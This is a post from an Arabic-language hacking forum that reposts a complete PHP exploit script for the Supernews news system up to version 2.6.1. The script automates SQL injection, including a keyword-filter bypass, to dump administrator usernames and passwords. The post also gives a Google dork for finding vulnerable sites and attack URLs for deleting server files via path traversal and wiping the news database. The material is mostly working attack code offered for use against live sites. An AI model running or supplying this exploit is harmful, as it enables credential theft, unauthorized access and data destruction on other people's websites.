منتديات جنون الهكرز
Welcome

اهلا وسهلا بكـ فيـ شبكة ومنتديات جنون الهكر

اذا كنت عضو في المنتدى قم بتسجيل الدخول

او اذا كنت غير مسجل قم بالانضمام عن طريق التسجيل

في المنتدى ليصلك كل شئ عن الهكر

منتديات جنون الهكرز

كل ما يخص الهكر تطوير المنتدى تطوير المواقع اختراق اختراق الايميلات اختراق المواقع اختراق الاجهزة ادواة الاختراق تعليم الاختراف تعليم الهكرز برامج اغاني افلام دوراة هكرز دوراة اختراق
 
الرئيسيةشبكة جنون الهكراليوميةمكتبة الصورس .و .جبحـثالتسجيلدخول











شاطر | 
 

 ثغره جديده { Supernews <= 2.6.1 SQL Injection Exploit }

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
azooz princ
مصمم المنتدى
مصمم المنتدى
avatar

الجنس : ذكر
عدد المساهمات : 178
تاريخ الميلاد : 03/03/1992
تاريخ التسجيل : 13/07/2009
25
الموقع : http://hakrs10.yoo7.com/
العمل/الترفيه العمل/الترفيه : الكمبيوتر
المزاج رايق

مُساهمةموضوع: ثغره جديده { Supernews <= 2.6.1 SQL Injection Exploit }    الثلاثاء مايو 22, 2012 4:41 am

بسم الله الرحمن الرحيم


كود PHP:
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail odnanrefsetnop@bol.com.br

SuperNews are a brazilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass this filters. See:
seselectlect
After removing "select" word, will stay another "select" word. See more:
seSELECTlect

Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.

Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".

Usage:
php exploit.php http://target.com/supernews/

For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://target.com/news/

Supernews <= 2.6.1 SQL Injection Exploit
Coded by WhiteCollarGroup - www.wcgroup.host56.com
Use at your own risk.

[*] Trying to access server...[*] Detecting version... :-o
[!] Version: >2.6.1 :-)
[!] Administration panel: http://target.com/news/admin/adm_noticias.php
[i] Type "exploit.php moreinfo" for get others vulnerabilities.[*] Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! :-D

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
$count = 0;
$offset = strpos($haystack, $needle);
//If we don't replace the first, go ahead and skip it
if (!$replace_first) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
while ($offset !== false) {
$haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
$count++;
$offset += strlen($replace);
$offset = strpos($haystack, $needle, $offset);
if ($offset !== false) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
}
return $haystack;
}
function removeaddregex($str) {
return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
$chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
foreach($chars as $char) {
$str = str_replace($char, "\\".$char, $str);
}
return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by WhiteCollarGroup - www.wcgroup.host56.com\nUse at your own risk.\n\n";

if($argc!=2) {
echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://target.com/supernews
php $argv[0] https://target.com/supernews/";
exit;
}

if($argv[1]=="moreinfo") {
echo "\nMore vulnerabilities:
- Deleting files
You can delete files on the server, after login, using the URL:
http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.

- Deleting all news on the database:
You can delete all news on the database with one request, only. Look:
http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

All vulnerabilities discovered by WCGroup.\n";
exit;
}

$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
$uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
$url = $uri."index.php?noticia=".urlencode("-1")."+";
}

$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n[*] Detecting version... :-o";

$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version: >2.6.1 :-)";
$version = 1;
} else {
$gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version =2.6.1 :-)";
$version = 2;
} else {
echo "\n[-] Unknown version :-S";
$version = 3;
}
}
if($version!=3) {
echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
echo "\n[i] Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
echo "\n[*] Getting user & pass 8-]";
}

if($version==1) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
elseif($version==2) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
else {
echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
echo "\nIf you want, try to access manually:";
echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
echo "\nWe're sorry.";
}

echo "\n";



رابط الثغره : http://www.exploit-db.com/exploits/18913



تحياتي Wink

_________________

للاستفسار او طلب المساعدة


hakrs_10@hotmail.com


الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://hakrs10.yoo7.com
 
ثغره جديده { Supernews <= 2.6.1 SQL Injection Exploit }
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» boilers by hager mandour

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات جنون الهكرز :: الاقسمة الخاصة بالاختراق والهكرز :: قسم الثغرات-
انتقل الى: